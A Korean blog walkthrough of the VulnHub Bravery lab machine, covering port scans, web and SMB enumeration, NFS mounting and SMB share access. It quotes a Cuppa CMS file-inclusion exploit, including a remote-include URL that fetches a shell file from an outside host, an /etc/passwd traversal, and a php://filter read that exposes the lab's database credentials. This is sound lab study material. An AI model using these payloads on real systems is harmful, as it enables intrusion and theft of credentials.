https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/
* 파일 토렌트에서 받아야 함
챕터 1
1. Scanning
[root@takudaddy ~]# nmap 192.168.10.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-23 14:47 KST
Nmap scan report for 192.168.10.14
Not shown: 990 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
2049/tcp open nfs
3306/tcp open mysql
8080/tcp open http-proxy
[root@takudaddy ~]# nmap -p- 192.168.10.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-23 14:49 KST
Nmap scan report for 192.168.10.14
Host is up (0.000068s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
2049/tcp open nfs
3306/tcp open mysql
8080/tcp open http-proxy
20048/tcp open mountd
39202/tcp open unknown
44315/tcp open unknown
MAC Address: 08:00:27:A5:64:10 (Oracle VirtualBox virtual NIC)
[root@takudaddy ~]# nmap -sV -O 192.168.10.14
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
53/tcp open domain dnsmasq 2.76
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http nginx 1.12.2
MAC Address: 08:00:27:A5:64:10 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: BRAVERY
[root@takudaddy ~]# nmap -A 192.168.10.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-23 14:51 KST
Nmap scan report for 192.168.10.14
Host is up (0.00015s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 4d:8f:bc:01:49:75:83:00:65:a9:53:a9:75:c6:57:33 (RSA)
| 256 92:f7:04:e2:09:aa:d0:d7:e6:fd:21:67:1f:bd:64:ce (ECDSA)
|_ 256 fb:08:cd:e8:45:8c:1a:c1:06:1b:24:73:33:a5:e4:77 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 34591/udp6 nlockmgr
| 100021 1,3,4 34614/udp nlockmgr
| 100021 1,3,4 41985/tcp6 nlockmgr
| 100021 1,3,4 44315/tcp nlockmgr
| 100024 1 39202/tcp status
| 100024 1 46606/tcp6 status
| 100024 1 50957/udp6 status
| 100024 1 52626/udp status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2018-06-10T15:53:25
|_Not valid after: 2019-06-10T15:53:25
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.7.1 (workgroup: WORKGROUP)
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http nginx 1.12.2
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 4 disallowed entries
|_/cgi-bin/ /qwertyuiop.html /private /public
|_http-server-header: nginx/1.12.2
|_http-title: Welcome to Bravery! This is SPARTA!
MAC Address: 08:00:27:A5:64:10 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: BRAVERY
Host script results:
|_clock-skew: mean: 1h20m03s, deviation: 2h18m34s, median: 2s
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.1)
| Computer name: localhost
| NetBIOS computer name: BRAVERY\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2021-03-23T01:51:46-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-03-23T05:51:46
|_ start_date: N/A
: nfs / rpcbind
2. Enumeration
[root@takudaddy /script]# ./webenum.sh 192.168.10.14
=======================================================
Web Enumertation tool
by takudaddy
=======================================================
[ Running ] Nikto against 192.168.10.14
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.10.14
+ Target Hostname: 192.168.10.14
+ Target Port: 80
+ Start Time: 2021-03-23 14:54:52 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/1.0.2k-fips appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.4.16 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/5.4.16
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8724 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2021-03-23 14:55:37 (GMT9) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[ Running ] Dirb against 192.168.10.14
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 23 14:55:37 2021
URL_BASE: http://192.168.10.14/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.10.14/ ----
+ http://192.168.10.14/0 (CODE:200|SIZE:2)
+ http://192.168.10.14/1 (CODE:200|SIZE:2)
+ http://192.168.10.14/2 (CODE:200|SIZE:2)
+ http://192.168.10.14/3 (CODE:200|SIZE:2)
+ http://192.168.10.14/4 (CODE:200|SIZE:2)
+ http://192.168.10.14/5 (CODE:200|SIZE:2)
+ http://192.168.10.14/6 (CODE:200|SIZE:2)
+ http://192.168.10.14/7 (CODE:200|SIZE:2)
+ http://192.168.10.14/8 (CODE:200|SIZE:30)
+ http://192.168.10.14/9 (CODE:200|SIZE:2)
+ http://192.168.10.14/about (CODE:200|SIZE:79)
+ http://192.168.10.14/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.10.14/contactus (CODE:200|SIZE:27)
+ http://192.168.10.14/phpinfo.php (CODE:200|SIZE:1)
==> DIRECTORY: http://192.168.10.14/uploads/
---- Entering directory: http://192.168.10.14/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Mar 23 14:55:38 2021
DOWNLOADED: 4612 - FOUND: 14
[ Running ] WFUZZ against 192.168.10.14
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.10.14/FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000020: 200 1 L 1 W 2 Ch "3"
000000011: 200 1 L 1 W 2 Ch "2"
000000006: 200 1 L 1 W 2 Ch "1"
000000025: 200 1 L 7 W 79 Ch "about"
000000864: 301 7 L 20 W 237 Ch "uploads"
Total time: 0
Processed Requests: 951
Filtered Requests: 946
Requests/sec.: 0
[ Runnung ] enum4linux for SMB against 192.168.10.14
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 23 14:55:39 2021
==========================
| Target Information |
==========================
Target ........... 192.168.10.14
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================================
| Share Enumeration on 192.168.10.14 |
==========================================
Sharename Type Comment
--------- ---- -------
anonymous Disk
secured Disk
IPC$ IPC IPC Service (Samba Server 4.7.1)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 192.168.10.14
//192.168.10.14/anonymous Mapping: OK, Listing: OK
//192.168.10.14/secured Mapping: DENIED, Listing: N/A
//192.168.10.14/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
=====================================================
| Enumerating Workgroup/Domain on 192.168.10.14 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\david (Local User)
S-1-22-1-1001 Unix User\ossec (Local User)
S-1-22-1-1002 Unix User\ossecm (Local User)
S-1-22-1-1003 Unix User\ossecr (Local User)
S-1-22-1-1004 Unix User\rick (Local User)
: user 리스트는 파일로 만들어 저장!
: //192.168.10.14/anonymous 접속 가능
# 80
# 8080
/about
/contactus
/cgi-bin
/uploads
:8080/about
https://www.captiongenerator.com/1075692/Try-Harder
3. nfs check
[root@takudaddy /mnt]# nmap -sU -sT 192.168.10.14 -p 2049
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-23 15:26 KST
Nmap scan report for 192.168.10.14
Host is up (0.00019s latency).
PORT STATE SERVICE
2049/tcp open nfs
2049/udp open|filtered nfs
MAC Address: 08:00:27:A5:64:10 (Oracle VirtualBox virtual NIC)
[root@takudaddy ~]# showmount -e 192.168.10.14
Export list for 192.168.10.14:
/var/nfsshare *
/var/nfsshare
우리쪽에 마운트 시켜 들어가보자.
[root@takudaddy /mnt]# mount -t nfs 192.168.10.14:/var/nfsshare /mnt/remote
[root@takudaddy /mnt]# ls -al
합계 8
drwxr-xr-x 3 root root 4096 3월 23 15:24 .
drwxr-xr-x 24 root root 4096 3월 18 14:20 ..
drwxrwxrwx 3 nobody nogroup 146 12월 26 2018 remote
4. penetration
해당 디렉터리에 접근해본다.
[root@takudaddy /mnt]# cd remote
[root@takudaddy /mnt/remote]# ls
README.txt discovery enumeration explore itinerary password.txt qwertyuioplkjhgfdsazxcvbnm
[root@takudaddy /mnt/remote]# ls -al
합계 28
drwxrwxrwx 3 nobody nogroup 146 12월 26 2018 .
drwxr-xr-x 3 root root 4096 3월 23 15:24 ..
-rw-r--r-- 1 root root 15 12월 26 2018 README.txt
-rw-r--r-- 1 root root 29 12월 26 2018 discovery
-rw-r--r-- 1 root root 51 12월 26 2018 enumeration
-rw-r--r-- 1 root root 20 12월 26 2018 explore
drwxr-xr-x 2 root root 19 12월 26 2018 itinerary
-rw-r--r-- 1 root root 104 12월 26 2018 password.txt
-rw-r--r-- 1 root root 67 12월 26 2018 qwertyuioplkjhgfdsazxcvbnm
[root@takudaddy /mnt/remote]# cat README.txt
read me first!
[root@takudaddy /mnt/remote]# cat password.txt
Passwords should not be stored in clear-text, written in post-its or written on files on the hard disk!
[root@takudaddy /mnt/remote]# cat qwertyuioplkjhgfdsazxcvbnm
Sometimes, the answer you seek may be right before your very eyes.
[root@takudaddy /mnt/remote]# cat explore
Exploration is fun!
[root@takudaddy /mnt/remote]# cat enumeration
Enumeration is at the heart of a penetration test!
[root@takudaddy /mnt/remote]# cat discovery
Remember to LOOK AROUND YOU!
[root@takudaddy /mnt/remote]# cd itinerary/
[root@takudaddy /mnt/remote/itinerary]# ls
david
[root@takudaddy /mnt/remote/itinerary]# ls -al
합계 4
drwxr-xr-x 2 root root 19 12월 26 2018 .
drwxrwxrwx 3 nobody nogroup 146 12월 26 2018 ..
-rw-r--r-- 1 root root 1733 12월 26 2018 david
[root@takudaddy /mnt/remote/itinerary]# cat david
David will need to fly to various cities for various conferences. Here is his schedule.
1 January 2019 (Tuesday):
New Year's Day. Spend time with family.
2 January 2019 (Wednesday):
0900: Depart for airport.
0945: Check in at Changi Airport, Terminal 3.
1355 - 2030 hrs (FRA time): Board flight (SQ326) and land in Frankfurt.
2230: Check into hotel.
3 January 2019 (Thursday):
0800: Leave hotel.
0900 - 1700: Attend the Banking and Enterprise Conference.
1730 - 2130: Private reception with the Chancellor.
2230: Retire in hotel.
4 January 2019 (Friday):
0800: Check out from hotel.
0900: Check in at Frankfurt Main.
1305 - 1355: Board flight (LH1190) and land in Zurich.
1600 - 1900: Dinner reception
2000: Check into hotel.
5 January 2019 (Saturday):
0800: Leave hotel.
0930 - 1230: Visit University of Zurich.
1300 - 1400: Working lunch with Mr. Pandelson
1430 - 1730: Dialogue with students at the University of Zurich.
1800 - 2100: Working dinner with Mr. Robert James Miller and wife.
2200: Check into hotel.
6 January 2019 (Sunday):
0730: Leave hotel.
0800 - 1100: Give a lecture on Software Security and Design at the University of Zurich.
1130: Check in at Zurich.
1715 - 2025: Board flight (LX18) and land in Newark.
2230: Check into hotel.
7 January 2019 (Monday):
0800: Leave hotel.
0900 - 1200: Visit Goldman Sachs HQ
1230 - 1330: Working lunch with Bill de Blasio
1400 - 1700: Visit McKinsey HQ
1730 - 1830: Visit World Trade Center Memorial
2030: Return to hotel.
8 January 2019 (Tuesday):
0630: Check out from hotel.
0730: Check in at Newark.
0945 - 1715 (+1): Board flight (SQ21)
9 January 2019 (Wednesday):
1715: Land in Singapore.
1815 - 2015: Dinner with wife.
2100: Clear local emails and head to bed.
의심되는 단어들 저장
david
qwertyuioplkjhgfdsazxcvbnm
혹시나 해서 ssh키를 복사해 로그인 시도했지만 불가.
챕터 2.
생각해보니 8080 포트에 대한 스캐닝 작업을 안했다.
1. web enumertaion
[root@takudaddy /script]# ./webenum.sh 192.168.10.14:8080
=======================================================
Web Enumertation tool
by takudaddy
=======================================================
[ Running ] Nikto against 192.168.10.14:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.10.14
+ Target Hostname: 192.168.10.14
+ Target Port: 8080
+ Start Time: 2021-03-23 16:01:57 (GMT9)
---------------------------------------------------------------------------
+ Server: nginx/1.12.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/qwertyuiop.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/public/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ /cgi-bin/blog/mt.cfg: Movable Type configuration file found. Should not be available remotely.
+ /cgi-bin/mt-static/mt.cfg: Movable Type configuration file found. Should not be available remotely.
+ /cgi-bin/mt/mt.cfg: Movable Type configuration file found. Should not be available remotely.
+ OSVDB-3092: /public/: This might be interesting...
+ /httpd.conf: Apache httpd.conf configuration file
+ /httpd.conf.bak: Apache httpd.conf configuration file
+ 9541 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2021-03-23 16:02:08 (GMT9) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[ Running ] Dirb against 192.168.10.14:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 23 16:02:08 2021
URL_BASE: http://192.168.10.14:8080/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.10.14:8080/ ----
+ http://192.168.10.14:8080/about (CODE:200|SIZE:503)
+ http://192.168.10.14:8080/index.html (CODE:200|SIZE:2637)
==> DIRECTORY: http://192.168.10.14:8080/private/
==> DIRECTORY: http://192.168.10.14:8080/public/
+ http://192.168.10.14:8080/robots.txt (CODE:200|SIZE:103)
---- Entering directory: http://192.168.10.14:8080/private/ ----
(!) WARNING: All responses for this directory seem to be CODE = 403.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.14:8080/public/ ----
==> DIRECTORY: http://192.168.10.14:8080/public/css/
==> DIRECTORY: http://192.168.10.14:8080/public/fonts/
==> DIRECTORY: http://192.168.10.14:8080/public/img/
+ http://192.168.10.14:8080/public/index.html (CODE:200|SIZE:22963)
==> DIRECTORY: http://192.168.10.14:8080/public/js/
---- Entering directory: http://192.168.10.14:8080/public/css/ ----
==> DIRECTORY: http://192.168.10.14:8080/public/css/theme/
---- Entering directory: http://192.168.10.14:8080/public/fonts/ ----
---- Entering directory: http://192.168.10.14:8080/public/img/ ----
==> DIRECTORY: http://192.168.10.14:8080/public/img/elements/
---- Entering directory: http://192.168.10.14:8080/public/js/ ----
==> DIRECTORY: http://192.168.10.14:8080/public/js/vendor/
---- Entering directory: http://192.168.10.14:8080/public/css/theme/ ----
---- Entering directory: http://192.168.10.14:8080/public/img/elements/ ----
---- Entering directory: http://192.168.10.14:8080/public/js/vendor/ ----
-----------------
END_TIME: Tue Mar 23 16:02:20 2021
DOWNLOADED: 41608 - FOUND: 4
[ Running ] WFUZZ against 192.168.10.14:8080
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.10.14:8080/FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000025: 200 19 L 90 W 503 Ch "about"
000000654: 301 7 L 12 W 185 Ch "public"
000000636: 301 7 L 12 W 185 Ch "private"
Total time: 0
Processed Requests: 951
Filtered Requests: 948
Requests/sec.: 0
: robots.txt
/qwertyuiop.html
/public
/private
OSVDB-3092
발견. 들어가 본다
nginx/1.12.2
https://www.securityfocus.com/bid/63814/info
: 별 소득 없음
챕터 3
현재 알아낸 정보 중
시도하지 않은 것이
//192.168.10.14/anonymous
//192.168.10.14/secured 와
암호로 추정되는
qwertyuioplkjhgfdsazxcvbnm
이를 활용해 smb-client로 접속해본다.
[root@takudaddy ~/brave]# smbclient //192.168.10.14/anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \>
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \>
smb: \> ls
. D 0 Fri Sep 28 22:01:35 2018
.. D 0 Fri Jun 15 01:30:39 2018
patrick's folder D 0 Fri Sep 28 21:38:27 2018
qiu's folder D 0 Fri Sep 28 22:27:20 2018
genevieve's folder D 0 Fri Sep 28 22:08:31 2018
david's folder D 0 Wed Dec 26 11:19:51 2018
kenny's folder D 0 Fri Sep 28 21:52:49 2018
qinyi's folder D 0 Fri Sep 28 21:45:22 2018
sara's folder D 0 Fri Sep 28 22:34:23 2018
readme.txt N 489 Fri Sep 28 22:54:03 2018
17811456 blocks of size 1024. 13178428 blocks available
smb: \>
smb: \> get readme.txt
getting file \readme.txt of size 489 as readme.txt (238.8 KiloBytes/sec) (average 238.8 KiloBytes/sec)
smb: \> quit
[root@takudaddy ~/brave]# ls
38846.txt 9829.txt readme.txt req.txt user.txt
[root@takudaddy ~/brave]# cat readme.txt
-- READ ME! --
This is an INTERNAL file-sharing system across SMB. While awaiting migration to Sharepoint, we are currently relying on the use of the SMB protocol to share information.
Once we migrate everything to Sharepoint, we will kill off this temporary service. This service will be re-purposes to only share UNCLASSIFIED information.
We also noticed the archival of plenty of e-mail. Please remove all of that before migration, unless you need them.
Regards
Genevieve the Brave
성공이다.
이번에는 secured 로 들어가보자.
[root@takudaddy ~/brave]# smbclient //192.168.10.14/secured
Enter WORKGROUP\root's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
[root@takudaddy ~/brave]# smbclient //192.168.10.14/secured -U david
Enter WORKGROUP\david's password:
session setup failed: NT_STATUS_LOGON_FAILURE
[root@takudaddy ~/brave]# smbclient //192.168.10.14/secured -U David
Enter WORKGROUP\David's password:
Try "help" to get a list of possible commands.
smb: \>
smb: \> ls
. D 0 Fri Sep 28 22:52:14 2018
.. D 0 Fri Jun 15 01:30:39 2018
david.txt N 376 Sat Jun 16 17:36:07 2018
genevieve.txt N 398 Tue Jul 24 01:51:27 2018
README.txt N 323 Tue Jul 24 10:58:53 2018
17811456 blocks of size 1024. 13178704 blocks available
smb: \> mget *
Get file david.txt? y
getting file \david.txt of size 376 as david.txt (367.2 KiloBytes/sec) (average 367.2 KiloBytes/sec)
Get file genevieve.txt? y
getting file \genevieve.txt of size 398 as genevieve.txt (194.3 KiloBytes/sec) (average 252.0 KiloBytes/sec)
Get file README.txt? y
getting file \README.txt of size 323 as README.txt (157.7 KiloBytes/sec) (average 214.3 KiloBytes/sec)
smb: \>
smb: \> quit
[root@takudaddy ~/brave]# ls
38846.txt 9829.txt README.txt david.txt genevieve.txt readme.txt req.txt user.txt
[root@takudaddy ~/brave]# cat david.txt
I have concerns over how the developers are designing their webpage. The use of "developmentsecretpage" is too long and unwieldy. We should cut short the addresses in our local domain.
1. Reminder to tell Patrick to replace "developmentsecretpage" with "devops".
2. Request the intern to adjust her Favourites to http://<developmentIPandport>/devops/directortestpagev1.php.
[root@takudaddy ~/brave]#
[root@takudaddy ~/brave]# cat genevieve.txt
Hi! This is Genevieve!
We are still trying to construct our department's IT infrastructure; it's been proving painful so far.
If you wouldn't mind, please do not subject my site (http://192.168.254.155/genevieve) to any load-test as of yet. We're trying to establish quite a few things:
a) File-share to our director.
b) Setting up our CMS.
c) Requesting for a HIDS solution to secure our host.
[root@takudaddy ~/brave]#
[root@takudaddy ~/brave]# cat README.txt
README FOR THE USE OF THE BRAVERY MACHINE:
Your use of the BRAVERY machine is subject to the following conditions:
1. You are a permanent staff in Good Tech Inc.
2. Your rank is HEAD and above.
3. You have obtained your BRAVERY badges.
For more enquiries, please log into the CMS using the correct magic word: goodtech.
[root@takudaddy ~/brave]#
성공!
정보를 얻었다.
developmentsecretpage
http://<developmentIPandport>/devops/directortestpagev1.php.
http://192.168.254.155/genevieve
magic word: goodtech.
cuppa cms?
[root@takudaddy ~/brave]# searchsploit cuppa cms
------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------ ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
[root@takudaddy ~/brave]# searchsploit -m php/webapps/25971.txt
Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
URL: https://www.exploit-db.com/exploits/25971
Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
File Type: ASCII text, with very long lines, with CRLF line terminators
Copied to: /root/brave/25971.txt
[root@takudaddy ~/brave]# cat 25971.txt
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
php code injection이 가능하단다.
사용 방법대로 실험해보자.
alertConfigField.php?urlConfig=takudaddy.tistory.com/
alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiYnJhdmVyeSI7CgkJcHVibGljICR1c2VyID0gInJvb3QiOwoJCXB1YmxpYyAkcGFzc3dvcmQgPSAicjAwdGlzYXdlczBtZSI7CgkJcHVibGljICR0YWJsZV9wcmVmaXggPSAiY3VfIjsKCQlwdWJsaWMgJGFkbWluaXN0cmF0b3JfdGVtcGxhdGUgPSAiZGVmYXVsdCI7CgkJcHVibGljICRsaXN0X2xpbWl0ID0gMjU7CgkJcHVibGljICR0b2tlbiA9ICJPQnFJUHFsRldmM1giOwoJCXB1YmxpYyAkYWxsb3dlZF9leHRlbnNpb25zID0gIiouYm1wOyAqLmNzdjsgKi5kb2M7ICouZ2lmOyAqLmljbzsgKi5qcGc7ICouanBlZzsgKi5vZGc7ICoub2RwOyAqLm9kczsgKi5vZHQ7ICoucGRmOyAqLnBuZzsgKi5wcHQ7ICouc3dmOyAqLnR4dDsgKi54Y2Y7ICoueGxzOyAqLmRvY3g7ICoueGxzeCI7CgkJcHVibGljICR1cGxvYWRfZGVmYXVsdF9wYXRoID0gIm1lZGlhL3VwbG9hZHNGaWxlcyI7CgkJcHVibGljICRtYXhpbXVtX2ZpbGVfc2l6ZSA9ICI1MjQyODgwIjsKCQlwdWJsaWMgJHNlY3VyZV9sb2dpbiA9IDA7CgkJcHVibGljICRzZWN1cmVfbG9naW5fdmFsdWUgPSAiZ29vZHRlY2giOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3JlZGlyZWN0ID0gImRvb3JzaGVsbC5qcGciOwoJfSAKPz4K
위 내용을 디코딩 하면(https://www.base64decode.org/)
<?php
class Configuration{
public $host = "localhost";
public $db = "bravery";
public $user = "root";
public $password = "r00tisawes0me";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "goodtech";
public $secure_login_redirect = "doorshell.jpg";
}
?>
db명 : bravery
user : root
